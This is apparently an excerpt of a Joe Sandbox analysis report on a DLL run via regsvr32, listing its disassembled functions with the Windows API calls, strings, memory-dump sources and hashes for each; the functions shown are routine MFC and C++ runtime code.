                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043A65, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043A6C
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
                                                                                                          • int.LIBCPMT ref: 10043A8D
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043A96
                                                                                                          • ctype.LIBCPMT ref: 10043AB0
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043AD2
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 2535038987-3145022300
                                                                                                          • Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
                                                                                                          • Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043C84, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043C8B
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
                                                                                                          • int.LIBCPMT ref: 10043CAC
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043CB5
                                                                                                          • codecvt.LIBCPMT ref: 10043CCF
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043CF1
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043D01
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043D07
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 577375395-3145022300
                                                                                                          • Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
                                                                                                          • Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10023423
                                                                                                          • FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 1002345E
                                                                                                            • Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C
                                                                                                          • LockResource.KERNEL32(?,00000024,1000150C,00000000,E5334AD4), ref: 1002346F
                                                                                                          • GetDesktopWindow.USER32 ref: 100234A2
                                                                                                          • IsWindowEnabled.USER32(?), ref: 100234B0
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 100234BF
                                                                                                            • Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,E5334AD4), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,E5334AD4), ref: 100235D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 964565984-0
                                                                                                          • Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
                                                                                                          • Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028C9F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                                                                                          • String ID: AfxOldWndProc423
                                                                                                          • API String ID: 2109165785-1060338832
                                                                                                          • Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
                                                                                                          • Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStockObject.GDI32(00000011), ref: 1002B9C8
                                                                                                          • GetStockObject.GDI32(0000000D), ref: 1002B9D0
                                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
                                                                                                          • GetDC.USER32(00000000), ref: 1002B9EC
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
                                                                                                          • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
                                                                                                          • ReleaseDC.USER32 ref: 1002BA18
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                          • String ID: System
                                                                                                          • API String ID: 46613423-3470857405
                                                                                                          • Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
                                                                                                          • Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3697954797-0
                                                                                                          • Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
                                                                                                          • Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10001982
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                          • Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
                                                                                                          • Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002104C
                                                                                                          • lstrcmpA.KERNEL32(?,?), ref: 10021058
                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
                                                                                                          • GlobalLock.KERNEL32 ref: 1002109C
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1
                                                                                                            • Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
                                                                                                            • Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
                                                                                                            • Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 168474834-0
                                                                                                          • Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
                                                                                                          • Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A98E, Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A99D
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9A4
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9AB
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9B5
                                                                                                          • GetDC.USER32(00000000), ref: 1002A9BF
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
                                                                                                          • ReleaseDC.USER32 ref: 1002A9E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1151147025-0
                                                                                                          • Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
                                                                                                          • Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002B878
                                                                                                          • lstrlenA.KERNEL32(?), ref: 1002B8C3
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
                                                                                                          • _wcslen.LIBCMT ref: 1002B901
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                                                                                                          • String ID: System
                                                                                                          • API String ID: 4253822919-3470857405
                                                                                                          • Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
                                                                                                          • Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 100270EF
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 10027113
                                                                                                          • UpdateWindow.USER32(?), ref: 1002712E
                                                                                                          • SendMessageA.USER32 ref: 1002714F
                                                                                                          • SendMessageA.USER32 ref: 10027167
                                                                                                          • UpdateWindow.USER32(?), ref: 100271AA
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 100271DB
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                          • String ID:
                                                                                                          • API String ID: 2853195852-0
                                                                                                          • Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
                                                                                                          • Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend_memset
                                                                                                          • String ID: ,
                                                                                                          • API String ID: 2997958587-3772416878
                                                                                                          • Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
                                                                                                          • Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10022468
                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002258B
                                                                                                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
